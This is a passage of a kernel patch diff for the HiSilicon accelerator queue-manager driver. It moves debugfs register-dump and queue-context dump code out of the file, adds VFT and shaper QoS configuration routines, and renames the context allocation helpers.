+-	{"QM_ECC_1BIT_INF               ",  0x104004ull},
+-	{"QM_ECC_MBIT_INF               ",  0x10400cull},
+-	{"QM_DFX_ACC_RDY_VLD0           ",  0x1040a0ull},
+-	{"QM_DFX_ACC_RDY_VLD1           ",  0x1040a4ull},
+-	{"QM_DFX_AXI_RDY_VLD            ",  0x1040a8ull},
+-	{"QM_DFX_FF_ST0                 ",  0x1040c8ull},
+-	{"QM_DFX_FF_ST1                 ",  0x1040ccull},
+-	{"QM_DFX_FF_ST2                 ",  0x1040d0ull},
+-	{"QM_DFX_FF_ST3                 ",  0x1040d4ull},
+-	{"QM_DFX_FF_ST4                 ",  0x1040d8ull},
+-	{"QM_DFX_FF_ST5                 ",  0x1040dcull},
+-	{"QM_DFX_FF_ST6                 ",  0x1040e0ull},
+-	{"QM_IN_IDLE_ST                 ",  0x1040e4ull},
+-};
+-
+-static const struct debugfs_reg32 qm_vf_dfx_regs[] = {
+-	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
+-};
+-
+-/**
+- * hisi_qm_regs_dump() - Dump registers's value.
+- * @s: debugfs file handle.
+- * @regset: accelerator registers information.
+- *
+- * Dump accelerator registers.
+- */
+-void hisi_qm_regs_dump(struct seq_file *s, struct debugfs_regset32 *regset)
+-{
+-	struct pci_dev *pdev = to_pci_dev(regset->dev);
+-	struct hisi_qm *qm = pci_get_drvdata(pdev);
+-	const struct debugfs_reg32 *regs = regset->regs;
+-	int regs_len = regset->nregs;
+-	int i, ret;
+-	u32 val;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return;
+-
+-	for (i = 0; i < regs_len; i++) {
+-		val = readl(regset->base + regs[i].offset);
+-		seq_printf(s, "%s= 0x%08x\n", regs[i].name, val);
+-	}
+-
+-	hisi_qm_put_dfx_access(qm);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_regs_dump);
+-
+-static int qm_regs_show(struct seq_file *s, void *unused)
+-{
+-	struct hisi_qm *qm = s->private;
+-	struct debugfs_regset32 regset;
+-
+-	if (qm->fun_type == QM_HW_PF) {
+-		regset.regs = qm_dfx_regs;
+-		regset.nregs = ARRAY_SIZE(qm_dfx_regs);
+-	} else {
+-		regset.regs = qm_vf_dfx_regs;
+-		regset.nregs = ARRAY_SIZE(qm_vf_dfx_regs);
+-	}
+-
+-	regset.base = qm->io_base;
+-	regset.dev = &qm->pdev->dev;
+-
+-	hisi_qm_regs_dump(s, &regset);
+-
+-	return 0;
+-}
+-
+-DEFINE_SHOW_ATTRIBUTE(qm_regs);
+-
+-static struct dfx_diff_registers *dfx_regs_init(struct hisi_qm *qm,
+-	const struct dfx_diff_registers *cregs, int reg_len)
+-{
+-	struct dfx_diff_registers *diff_regs;
+-	u32 j, base_offset;
+-	int i;
+-
+-	diff_regs = kcalloc(reg_len, sizeof(*diff_regs), GFP_KERNEL);
+-	if (!diff_regs)
+-		return ERR_PTR(-ENOMEM);
+-
+-	for (i = 0; i < reg_len; i++) {
+-		if (!cregs[i].reg_len)
+-			continue;
+-
+-		diff_regs[i].reg_offset = cregs[i].reg_offset;
+-		diff_regs[i].reg_len = cregs[i].reg_len;
+-		diff_regs[i].regs = kcalloc(QM_DFX_REGS_LEN, cregs[i].reg_len,
+-					 GFP_KERNEL);
+-		if (!diff_regs[i].regs)
+-			goto alloc_error;
+-
+-		for (j = 0; j < diff_regs[i].reg_len; j++) {
+-			base_offset = diff_regs[i].reg_offset +
+-					j * QM_DFX_REGS_LEN;
+-			diff_regs[i].regs[j] = readl(qm->io_base + base_offset);
+-		}
+-	}
+-
+-	return diff_regs;
+-
+-alloc_error:
+-	while (i > 0) {
+-		i--;
+-		kfree(diff_regs[i].regs);
+-	}
+-	kfree(diff_regs);
+-	return ERR_PTR(-ENOMEM);
+-}
+-
+-static void dfx_regs_uninit(struct hisi_qm *qm,
+-		struct dfx_diff_registers *dregs, int reg_len)
+-{
+-	int i;
+-
+-	/* Setting the pointer is NULL to prevent double free */
+-	for (i = 0; i < reg_len; i++) {
+-		kfree(dregs[i].regs);
+-		dregs[i].regs = NULL;
+-	}
+-	kfree(dregs);
+-	dregs = NULL;
+-}
+-
+-/**
+- * hisi_qm_diff_regs_init() - Allocate memory for registers.
+- * @qm: device qm handle.
+- * @dregs: diff registers handle.
+- * @reg_len: diff registers region length.
+- */
+-int hisi_qm_diff_regs_init(struct hisi_qm *qm,
+-		struct dfx_diff_registers *dregs, int reg_len)
+-{
+-	if (!qm || !dregs || reg_len <= 0)
+-		return -EINVAL;
+-
+-	if (qm->fun_type != QM_HW_PF)
+-		return 0;
+-
+-	qm->debug.qm_diff_regs = dfx_regs_init(qm, qm_diff_regs,
+-						ARRAY_SIZE(qm_diff_regs));
+-	if (IS_ERR(qm->debug.qm_diff_regs))
+-		return PTR_ERR(qm->debug.qm_diff_regs);
+-
+-	qm->debug.acc_diff_regs = dfx_regs_init(qm, dregs, reg_len);
+-	if (IS_ERR(qm->debug.acc_diff_regs)) {
+-		dfx_regs_uninit(qm, qm->debug.qm_diff_regs,
+-				ARRAY_SIZE(qm_diff_regs));
+-		return PTR_ERR(qm->debug.acc_diff_regs);
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_diff_regs_init);
+-
+-/**
+- * hisi_qm_diff_regs_uninit() - Free memory for registers.
+- * @qm: device qm handle.
+- * @reg_len: diff registers region length.
+- */
+-void hisi_qm_diff_regs_uninit(struct hisi_qm *qm, int reg_len)
+-{
+-	if (!qm  || reg_len <= 0 || qm->fun_type != QM_HW_PF)
+-		return;
+-
+-	dfx_regs_uninit(qm, qm->debug.acc_diff_regs, reg_len);
+-	dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_diff_regs_uninit);
+-
+-/**
+- * hisi_qm_acc_diff_regs_dump() - Dump registers's value.
+- * @qm: device qm handle.
+- * @s: Debugfs file handle.
+- * @dregs: diff registers handle.
+- * @regs_len: diff registers region length.
+- */
+-void hisi_qm_acc_diff_regs_dump(struct hisi_qm *qm, struct seq_file *s,
+-	struct dfx_diff_registers *dregs, int regs_len)
+-{
+-	u32 j, val, base_offset;
+-	int i, ret;
+-
+-	if (!qm || !s || !dregs || regs_len <= 0)
+-		return;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return;
+-
+-	down_read(&qm->qps_lock);
+-	for (i = 0; i < regs_len; i++) {
+-		if (!dregs[i].reg_len)
+-			continue;
+-
+-		for (j = 0; j < dregs[i].reg_len; j++) {
+-			base_offset = dregs[i].reg_offset + j * QM_DFX_REGS_LEN;
+-			val = readl(qm->io_base + base_offset);
+-			if (val != dregs[i].regs[j])
+-				seq_printf(s, "0x%08x = 0x%08x ---> 0x%08x\n",
+-					   base_offset, dregs[i].regs[j], val);
+-		}
+-	}
+-	up_read(&qm->qps_lock);
+-
+-	hisi_qm_put_dfx_access(qm);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_acc_diff_regs_dump);
+-
+-static int qm_diff_regs_show(struct seq_file *s, void *unused)
+-{
+-	struct hisi_qm *qm = s->private;
+-
+-	hisi_qm_acc_diff_regs_dump(qm, s, qm->debug.qm_diff_regs,
+-					ARRAY_SIZE(qm_diff_regs));
+-
+-	return 0;
+-}
+-DEFINE_SHOW_ATTRIBUTE(qm_diff_regs);
+-
+-static ssize_t qm_cmd_read(struct file *filp, char __user *buffer,
+-			   size_t count, loff_t *pos)
+-{
+-	char buf[QM_DBG_READ_LEN];
+-	int len;
+-
+-	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n",
+-			"Please echo help to cmd to get help information");
+-
+-	return simple_read_from_buffer(buffer, count, pos, buf, len);
+-}
+-
+-static void *qm_ctx_alloc(struct hisi_qm *qm, size_t ctx_size,
+-			  dma_addr_t *dma_addr)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	void *ctx_addr;
+-
+-	ctx_addr = kzalloc(ctx_size, GFP_KERNEL);
+-	if (!ctx_addr)
+-		return ERR_PTR(-ENOMEM);
+-
+-	*dma_addr = dma_map_single(dev, ctx_addr, ctx_size, DMA_FROM_DEVICE);
+-	if (dma_mapping_error(dev, *dma_addr)) {
+-		dev_err(dev, "DMA mapping error!\n");
+-		kfree(ctx_addr);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	return ctx_addr;
+-}
+-
+-static void qm_ctx_free(struct hisi_qm *qm, size_t ctx_size,
+-			const void *ctx_addr, dma_addr_t *dma_addr)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-
+-	dma_unmap_single(dev, *dma_addr, ctx_size, DMA_FROM_DEVICE);
+-	kfree(ctx_addr);
+-}
+-
+-static void dump_show(struct hisi_qm *qm, void *info,
+-		     unsigned int info_size, char *info_name)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	u8 *info_curr = info;
+-	u32 i;
+-#define BYTE_PER_DW	4
+-
+-	dev_info(dev, "%s DUMP\n", info_name);
+-	for (i = 0; i < info_size; i += BYTE_PER_DW, info_curr += BYTE_PER_DW) {
+-		pr_info("DW%u: %02X%02X %02X%02X\n", i / BYTE_PER_DW,
+-			*(info_curr + 3), *(info_curr + 2), *(info_curr + 1), *(info_curr));
+-	}
+-}
+-
+-static int qm_dump_sqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
+-{
+-	return hisi_qm_mb(qm, QM_MB_CMD_SQC, dma_addr, qp_id, 1);
+-}
+-
+-static int qm_dump_cqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
+-{
+-	return hisi_qm_mb(qm, QM_MB_CMD_CQC, dma_addr, qp_id, 1);
+-}
+-
+-static int qm_sqc_dump(struct hisi_qm *qm, const char *s)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	struct qm_sqc *sqc, *sqc_curr;
+-	dma_addr_t sqc_dma;
+-	u32 qp_id;
+-	int ret;
+-
+-	if (!s)
+-		return -EINVAL;
+-
+-	ret = kstrtou32(s, 0, &qp_id);
+-	if (ret || qp_id >= qm->qp_num) {
+-		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
+-		return -EINVAL;
+-	}
+-
+-	sqc = qm_ctx_alloc(qm, sizeof(*sqc), &sqc_dma);
+-	if (IS_ERR(sqc))
+-		return PTR_ERR(sqc);
+-
+-	ret = qm_dump_sqc_raw(qm, sqc_dma, qp_id);
+-	if (ret) {
+-		down_read(&qm->qps_lock);
+-		if (qm->sqc) {
+-			sqc_curr = qm->sqc + qp_id;
+-
+-			dump_show(qm, sqc_curr, sizeof(*sqc), "SOFT SQC");
+-		}
+-		up_read(&qm->qps_lock);
+-
+-		goto free_ctx;
+-	}
+-
+-	dump_show(qm, sqc, sizeof(*sqc), "SQC");
+-
+-free_ctx:
+-	qm_ctx_free(qm, sizeof(*sqc), sqc, &sqc_dma);
+-	return 0;
+-}
+-
+-static int qm_cqc_dump(struct hisi_qm *qm, const char *s)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	struct qm_cqc *cqc, *cqc_curr;
+-	dma_addr_t cqc_dma;
+-	u32 qp_id;
+-	int ret;
+-
+-	if (!s)
+-		return -EINVAL;
+-
+-	ret = kstrtou32(s, 0, &qp_id);
+-	if (ret || qp_id >= qm->qp_num) {
+-		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
+-		return -EINVAL;
+-	}
+-
+-	cqc = qm_ctx_alloc(qm, sizeof(*cqc), &cqc_dma);
+-	if (IS_ERR(cqc))
+-		return PTR_ERR(cqc);
+-
+-	ret = qm_dump_cqc_raw(qm, cqc_dma, qp_id);
+-	if (ret) {
+-		down_read(&qm->qps_lock);
+-		if (qm->cqc) {
+-			cqc_curr = qm->cqc + qp_id;
+-
+-			dump_show(qm, cqc_curr, sizeof(*cqc), "SOFT CQC");
+-		}
+-		up_read(&qm->qps_lock);
+-
+-		goto free_ctx;
+-	}
+-
+-	dump_show(qm, cqc, sizeof(*cqc), "CQC");
+-
+-free_ctx:
+-	qm_ctx_free(qm, sizeof(*cqc), cqc, &cqc_dma);
+-	return 0;
+-}
+-
+-static int qm_eqc_aeqc_dump(struct hisi_qm *qm, char *s, size_t size,
+-			    int cmd, char *name)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	dma_addr_t xeqc_dma;
+-	void *xeqc;
+-	int ret;
+-
+-	if (strsep(&s, " ")) {
+-		dev_err(dev, "Please do not input extra characters!\n");
+-		return -EINVAL;
+-	}
+-
+-	xeqc = qm_ctx_alloc(qm, size, &xeqc_dma);
+-	if (IS_ERR(xeqc))
+-		return PTR_ERR(xeqc);
+-
+-	ret = hisi_qm_mb(qm, cmd, xeqc_dma, 0, 1);
+-	if (ret)
+-		goto err_free_ctx;
+-
+-	dump_show(qm, xeqc, size, name);
+-
+-err_free_ctx:
+-	qm_ctx_free(qm, size, xeqc, &xeqc_dma);
+-	return ret;
+-}
+-
+-static int q_dump_param_parse(struct hisi_qm *qm, char *s,
+-			      u32 *e_id, u32 *q_id, u16 q_depth)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	unsigned int qp_num = qm->qp_num;
+-	char *presult;
+-	int ret;
+-
+-	presult = strsep(&s, " ");
+-	if (!presult) {
+-		dev_err(dev, "Please input qp number!\n");
+-		return -EINVAL;
+-	}
+-
+-	ret = kstrtou32(presult, 0, q_id);
+-	if (ret || *q_id >= qp_num) {
+-		dev_err(dev, "Please input qp num (0-%u)", qp_num - 1);
+-		return -EINVAL;
+-	}
+-
+-	presult = strsep(&s, " ");
+-	if (!presult) {
+-		dev_err(dev, "Please input sqe number!\n");
+-		return -EINVAL;
+-	}
+-
+-	ret = kstrtou32(presult, 0, e_id);
+-	if (ret || *e_id >= q_depth) {
+-		dev_err(dev, "Please input sqe num (0-%u)", q_depth - 1);
+-		return -EINVAL;
+-	}
+-
+-	if (strsep(&s, " ")) {
+-		dev_err(dev, "Please do not input extra characters!\n");
+-		return -EINVAL;
++		case SHAPER_VFT:
++			if (factor) {
++				tmp = factor->cir_b |
++				(factor->cir_u << QM_SHAPER_FACTOR_CIR_U_SHIFT) |
++				(factor->cir_s << QM_SHAPER_FACTOR_CIR_S_SHIFT) |
++				(QM_SHAPER_CBS_B << QM_SHAPER_FACTOR_CBS_B_SHIFT) |
++				(factor->cbs_s << QM_SHAPER_FACTOR_CBS_S_SHIFT);
++			}
++			break;
++		}
+ 	}
+ 
+-	return 0;
++	writel(lower_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_L);
++	writel(upper_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_H);
+ }
+ 
+-static int qm_sq_dump(struct hisi_qm *qm, char *s)
++static int qm_set_vft_common(struct hisi_qm *qm, enum vft_type type,
++			     u32 fun_num, u32 base, u32 number)
+ {
+-	u16 sq_depth = qm->qp_array->cq_depth;
+-	void *sqe, *sqe_curr;
+-	struct hisi_qp *qp;
+-	u32 qp_id, sqe_id;
++	struct qm_shaper_factor *factor = NULL;
++	unsigned int val;
+ 	int ret;
+ 
+-	ret = q_dump_param_parse(qm, s, &sqe_id, &qp_id, sq_depth);
++	if (type == SHAPER_VFT && test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
++		factor = &qm->factor[fun_num];
++
++	ret = readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
++					 val & BIT(0), POLL_PERIOD,
++					 POLL_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+-	sqe = kzalloc(qm->sqe_size * sq_depth, GFP_KERNEL);
+-	if (!sqe)
+-		return -ENOMEM;
++	writel(0x0, qm->io_base + QM_VFT_CFG_OP_WR);
++	writel(type, qm->io_base + QM_VFT_CFG_TYPE);
++	if (type == SHAPER_VFT)
++		fun_num |= base << QM_SHAPER_VFT_OFFSET;
+ 
+-	qp = &qm->qp_array[qp_id];
+-	memcpy(sqe, qp->sqe, qm->sqe_size * sq_depth);
+-	sqe_curr = sqe + (u32)(sqe_id * qm->sqe_size);
+-	memset(sqe_curr + qm->debug.sqe_mask_offset, QM_SQE_ADDR_MASK,
+-	       qm->debug.sqe_mask_len);
++	writel(fun_num, qm->io_base + QM_VFT_CFG);
+ 
+-	dump_show(qm, sqe_curr, qm->sqe_size, "SQE");
++	qm_vft_data_cfg(qm, type, base, number, factor);
+ 
+-	kfree(sqe);
++	writel(0x0, qm->io_base + QM_VFT_CFG_RDY);
++	writel(0x1, qm->io_base + QM_VFT_CFG_OP_ENABLE);
+ 
+-	return 0;
++	return readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
++					  val & BIT(0), POLL_PERIOD,
++					  POLL_TIMEOUT);
+ }
+ 
+-static int qm_cq_dump(struct hisi_qm *qm, char *s)
++static int qm_shaper_init_vft(struct hisi_qm *qm, u32 fun_num)
+ {
+-	struct qm_cqe *cqe_curr;
+-	struct hisi_qp *qp;
+-	u32 qp_id, cqe_id;
+-	int ret;
++	u32 qos = qm->factor[fun_num].func_qos;
++	int ret, i;
+ 
+-	ret = q_dump_param_parse(qm, s, &cqe_id, &qp_id, qm->qp_array->cq_depth);
+-	if (ret)
++	ret = qm_get_shaper_para(qos * QM_QOS_RATE, &qm->factor[fun_num]);
++	if (ret) {
++		dev_err(&qm->pdev->dev, "failed to calculate shaper parameter!\n");
+ 		return ret;
+-
+-	qp = &qm->qp_array[qp_id];
+-	cqe_curr = qp->cqe + cqe_id;
+-	dump_show(qm, cqe_curr, sizeof(struct qm_cqe), "CQE");
++	}
++	writel(qm->type_rate, qm->io_base + QM_SHAPER_CFG);
++	for (i = ALG_TYPE_0; i <= ALG_TYPE_1; i++) {
++		/* The same base queue number is reused for each alg type */
++		ret = qm_set_vft_common(qm, SHAPER_VFT, fun_num, i, 1);
++		if (ret)
++			return ret;
++	}
+ 
+ 	return 0;
+ }
+ 
+-static int qm_eq_aeq_dump(struct hisi_qm *qm, const char *s,
+-			  size_t size, char *name)
++/* This configuration must be done after qm_dev_mem_reset() */
++static int qm_set_sqc_cqc_vft(struct hisi_qm *qm, u32 fun_num, u32 base,
++			      u32 number)
+ {
+-	struct device *dev = &qm->pdev->dev;
+-	void *xeqe;
+-	u32 xeqe_id;
+-	int ret;
+-
+-	if (!s)
+-		return -EINVAL;
+-
+-	ret = kstrtou32(s, 0, &xeqe_id);
+-	if (ret)
+-		return -EINVAL;
++	int ret, i;
+ 
+-	if (!strcmp(name, "EQE") && xeqe_id >= qm->eq_depth) {
+-		dev_err(dev, "Please input eqe num (0-%u)", qm->eq_depth - 1);
+-		return -EINVAL;
+-	} else if (!strcmp(name, "AEQE") && xeqe_id >= qm->aeq_depth) {
+-		dev_err(dev, "Please input aeqe num (0-%u)", qm->eq_depth - 1);
+-		return -EINVAL;
++	for (i = SQC_VFT; i <= CQC_VFT; i++) {
++		ret = qm_set_vft_common(qm, i, fun_num, base, number);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	down_read(&qm->qps_lock);
+-
+-	if (qm->eqe && !strcmp(name, "EQE")) {
+-		xeqe = qm->eqe + xeqe_id;
+-	} else if (qm->aeqe && !strcmp(name, "AEQE")) {
+-		xeqe = qm->aeqe + xeqe_id;
+-	} else {
+-		ret = -EINVAL;
+-		goto err_unlock;
++	/* Initialize the default shaper QoS value */
++	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps)) {
++		ret = qm_shaper_init_vft(qm, fun_num);
++		if (ret)
++			goto back_sqc_cqc;
+ 	}
+ 
+-	dump_show(qm, xeqe, size, name);
++	return 0;
++back_sqc_cqc:
++	for (i = SQC_VFT; i <= CQC_VFT; i++)
++		qm_set_vft_common(qm, i, fun_num, 0, 0);
+ 
+-err_unlock:
+-	up_read(&qm->qps_lock);
+ 	return ret;
+ }
+ 
+-static int qm_dbg_help(struct hisi_qm *qm, char *s)
++static int qm_get_vft_v2(struct hisi_qm *qm, u32 *base, u32 *number)
+ {
+-	struct device *dev = &qm->pdev->dev;
++	u64 sqc_vft;
++	int ret;
+ 
+-	if (strsep(&s, " ")) {
+-		dev_err(dev, "Please do not input extra characters!\n");
+-		return -EINVAL;
+-	}
++	ret = hisi_qm_mb(qm, QM_MB_CMD_SQC_VFT_V2, 0, 0, 1);
++	if (ret)
++		return ret;
+ 
+-	dev_info(dev, "available commands:\n");
+-	dev_info(dev, "sqc <num>\n");
+-	dev_info(dev, "cqc <num>\n");
+-	dev_info(dev, "eqc\n");
+-	dev_info(dev, "aeqc\n");
+-	dev_info(dev, "sq <num> <e>\n");
+-	dev_info(dev, "cq <num> <e>\n");
+-	dev_info(dev, "eq <e>\n");
+-	dev_info(dev, "aeq <e>\n");
++	sqc_vft = readl(qm->io_base + QM_MB_CMD_DATA_ADDR_L) |
++		  ((u64)readl(qm->io_base + QM_MB_CMD_DATA_ADDR_H) << 32);
++	*base = QM_SQC_VFT_BASE_MASK_V2 & (sqc_vft >> QM_SQC_VFT_BASE_SHIFT_V2);
++	*number = (QM_SQC_VFT_NUM_MASK_v2 &
++		   (sqc_vft >> QM_SQC_VFT_NUM_SHIFT_V2)) + 1;
+ 
+ 	return 0;
+ }
+ 
+-static int qm_cmd_write_dump(struct hisi_qm *qm, const char *cmd_buf)
++void *hisi_qm_ctx_alloc(struct hisi_qm *qm, size_t ctx_size,
++			  dma_addr_t *dma_addr)
+ {
+ 	struct device *dev = &qm->pdev->dev;
+-	char *presult, *s, *s_tmp;
+-	int ret;
+-
+-	s = kstrdup(cmd_buf, GFP_KERNEL);
+-	if (!s)
+-		return -ENOMEM;
+-
+-	s_tmp = s;
+-	presult = strsep(&s, " ");
+-	if (!presult) {
+-		ret = -EINVAL;
+-		goto err_buffer_free;
+-	}
+-
+-	if (!strcmp(presult, "sqc"))
+-		ret = qm_sqc_dump(qm, s);
+-	else if (!strcmp(presult, "cqc"))
+-		ret = qm_cqc_dump(qm, s);
+-	else if (!strcmp(presult, "eqc"))
+-		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_eqc),
+-				       QM_MB_CMD_EQC, "EQC");
+-	else if (!strcmp(presult, "aeqc"))
+-		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_aeqc),
+-				       QM_MB_CMD_AEQC, "AEQC");
+-	else if (!strcmp(presult, "sq"))
+-		ret = qm_sq_dump(qm, s);
+-	else if (!strcmp(presult, "cq"))
+-		ret = qm_cq_dump(qm, s);
+-	else if (!strcmp(presult, "eq"))
+-		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_eqe), "EQE");
+-	else if (!strcmp(presult, "aeq"))
+-		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_aeqe), "AEQE");
+-	else if (!strcmp(presult, "help"))
+-		ret = qm_dbg_help(qm, s);
+-	else
+-		ret = -EINVAL;
++	void *ctx_addr;
+ 
+-	if (ret)
+-		dev_info(dev, "Please echo help\n");
++	ctx_addr = kzalloc(ctx_size, GFP_KERNEL);
++	if (!ctx_addr)
++		return ERR_PTR(-ENOMEM);
+ 
+-err_buffer_free:
+-	kfree(s_tmp);
++	*dma_addr = dma_map_single(dev, ctx_addr, ctx_size, DMA_FROM_DEVICE);
++	if (dma_mapping_error(dev, *dma_addr)) {
++		dev_err(dev, "DMA mapping error!\n");
++		kfree(ctx_addr);
++		return ERR_PTR(-ENOMEM);
++	}
+ 
+-	return ret;
++	return ctx_addr;
+ }
+ 
+-static ssize_t qm_cmd_write(struct file *filp, const char __user *buffer,
+-			    size_t count, loff_t *pos)
++void hisi_qm_ctx_free(struct hisi_qm *qm, size_t ctx_size,
++			const void *ctx_addr, dma_addr_t *dma_addr)
+ {
+-	struct hisi_qm *qm = filp->private_data;
+-	char *cmd_buf, *cmd_buf_tmp;
+-	int ret;
+-
+-	if (*pos)
+-		return 0;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return ret;
+-
+-	/* Judge if the instance is being reset. */
+-	if (unlikely(atomic_read(&qm->status.flags) == QM_STOP)) {
+-		ret = 0;
+-		goto put_dfx_access;
+-	}
+-
+-	if (count > QM_DBG_WRITE_LEN) {
+-		ret = -ENOSPC;
+-		goto put_dfx_access;
+-	}
+-
+-	cmd_buf = memdup_user_nul(buffer, count);
+-	if (IS_ERR(cmd_buf)) {
+-		ret = PTR_ERR(cmd_buf);
+-		goto put_dfx_access;
+-	}
+-
+-	cmd_buf_tmp = strchr(cmd_buf, '\n');
+-	if (cmd_buf_tmp) {
+-		*cmd_buf_tmp = '\0';
+-		count = cmd_buf_tmp - cmd_buf + 1;
+-	}
+-
+-	ret = qm_cmd_write_dump(qm, cmd_buf);
+-	if (ret) {
+-		kfree(cmd_buf);
+-		goto put_dfx_access;
+-	}
+-
+-	kfree(cmd_buf);
+-
+-	ret = count;
++	struct device *dev = &qm->pdev->dev;
+ 
+-put_dfx_access:
+-	hisi_qm_put_dfx_access(qm);
+-	return ret;
++	dma_unmap_single(dev, *dma_addr, ctx_size, DMA_FROM_DEVICE);
++	kfree(ctx_addr);
+ }
+ 
+-static const struct file_operations qm_cmd_fops = {
+-	.owner = THIS_MODULE,
+-	.open = simple_open,
+-	.read = qm_cmd_read,
+-	.write = qm_cmd_write,
+-};
+-
+-static void qm_create_debugfs_file(struct hisi_qm *qm, struct dentry *dir,
+-				   enum qm_debug_file index)
++static int qm_dump_sqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
+ {
+-	struct debugfs_file *file = qm->debug.files + index;
+-
+-	debugfs_create_file(qm_debug_file_name[index], 0600, dir, file,
+-			    &qm_debug_fops);
++	return hisi_qm_mb(qm, QM_MB_CMD_SQC, dma_addr, qp_id, 1);
++}
+ 
+-	file->index = index;
+-	mutex_init(&file->lock);
+-	file->debug = &qm->debug;
++static int qm_dump_cqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
++{
++	return hisi_qm_mb(qm, QM_MB_CMD_CQC, dma_addr, qp_id, 1);
+ }
+ 
+ static void qm_hw_error_init_v1(struct hisi_qm *qm)
+@@ -3100,7 +2128,7 @@ static int qm_drain_qp(struct hisi_qp *qp)
+ 		return ret;
+ 	}
+ 
+-	addr = qm_ctx_alloc(qm, size, &dma_addr);
++	addr = hisi_qm_ctx_alloc(qm, size, &dma_addr);
+ 	if (IS_ERR(addr)) {
+ 		dev_err(dev, "Failed to alloc ctx for sqc and cqc!\n");
+ 		return -ENOMEM;
+@@ -3135,7 +2163,7 @@ static int qm_drain_qp(struct hisi_qp *qp)
+ 		usleep_range(WAIT_PERIOD_US_MIN, WAIT_PERIOD_US_MAX);
+ 	}
+ 
+-	qm_ctx_free(qm, size, addr, &dma_addr);
++	hisi_qm_ctx_free(qm, size, addr, &dma_addr);
+ 
+ 	return ret;
+ }
+@@ -3659,7 +2687,6 @@ static void hisi_qm_pre_init(struct hisi_qm *qm)
+ 	mutex_init(&qm->mailbox_lock);
+ 	init_rwsem(&qm->qps_lock);
+ 	qm->qp_in_used = 0;
+-	qm->misc_ctl = false;
+ 	if (test_bit(QM_SUPPORT_RPM, &qm->caps)) {
+ 		if (!acpi_device_power_manageable(ACPI_COMPANION(&pdev->dev)))
+ 			dev_info(&pdev->dev, "_PS0 and _PR0 are not defined");
+@@ -3720,17 +2747,6 @@ static void hisi_qm_set_state(struct hisi_qm *qm, u8 state)
+ 		writel(state, qm->io_base + QM_VF_STATE);
+ }
+ 
+-static void qm_last_regs_uninit(struct hisi_qm *qm)
+-{
+-	struct qm_debug *debug = &qm->debug;
+-
+-	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
+-		return;
+-
+-	kfree(debug->qm_last_words);
+-	debug->qm_last_words = NULL;
+-}
+-
+ static void hisi_qm_unint_work(struct hisi_qm *qm)
+ {
+ 	destroy_workqueue(qm->wq);
+@@ -3761,8 +2777,6 @@ static void hisi_qm_memory_uninit(struct hisi_qm *qm)
+  */
+ void hisi_qm_uninit(struct hisi_qm *qm)
+ {
+-	qm_last_regs_uninit(qm);
+-
+ 	qm_cmd_uninit(qm);
+ 	hisi_qm_unint_work(qm);
+ 	down_write(&qm->qps_lock);
+@@ -4131,45 +3145,6 @@ err_unlock:
+ }
+ EXPORT_SYMBOL_GPL(hisi_qm_stop);
+ 
+-static ssize_t qm_status_read(struct file *filp, char __user *buffer,
+-			      size_t count, loff_t *pos)
+-{
+-	struct hisi_qm *qm = filp->private_data;
+-	char buf[QM_DBG_READ_LEN];
+-	int val, len;
+-
+-	val = atomic_read(&qm->status.flags);
+-	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n", qm_s[val]);
+-
+-	return simple_read_from_buffer(buffer, count, pos, buf, len);
+-}
+-
+-static const struct file_operations qm_status_fops = {
+-	.owner = THIS_MODULE,
+-	.open = simple_open,
+-	.read = qm_status_read,
+-};
+-
+-static int qm_debugfs_atomic64_set(void *data, u64 val)
+-{
+-	if (val)
+-		return -EINVAL;
+-
+-	atomic64_set((atomic64_t *)data, 0);
+-
+-	return 0;
+-}
+-
+-static int qm_debugfs_atomic64_get(void *data, u64 *val)
+-{
+-	*val = atomic64_read((atomic64_t *)data);
+-
+-	return 0;
+-}
+-
+-DEFINE_DEBUGFS_ATTRIBUTE(qm_atomic64_ops, qm_debugfs_atomic64_get,
+-			 qm_debugfs_atomic64_set, "%llu\n");
+-
+ static void qm_hw_error_init(struct hisi_qm *qm)
+ {
+ 	if (!qm->ops->hw_error_init) {
+@@ -4708,7 +3683,7 @@ static const struct file_operations qm_algqos_fops = {
+  *
+  * Create function qos debugfs files, VF ping PF to get function qos.
+  */
+-static void hisi_qm_set_algqos_init(struct hisi_qm *qm)
++void hisi_qm_set_algqos_init(struct hisi_qm *qm)
+ {
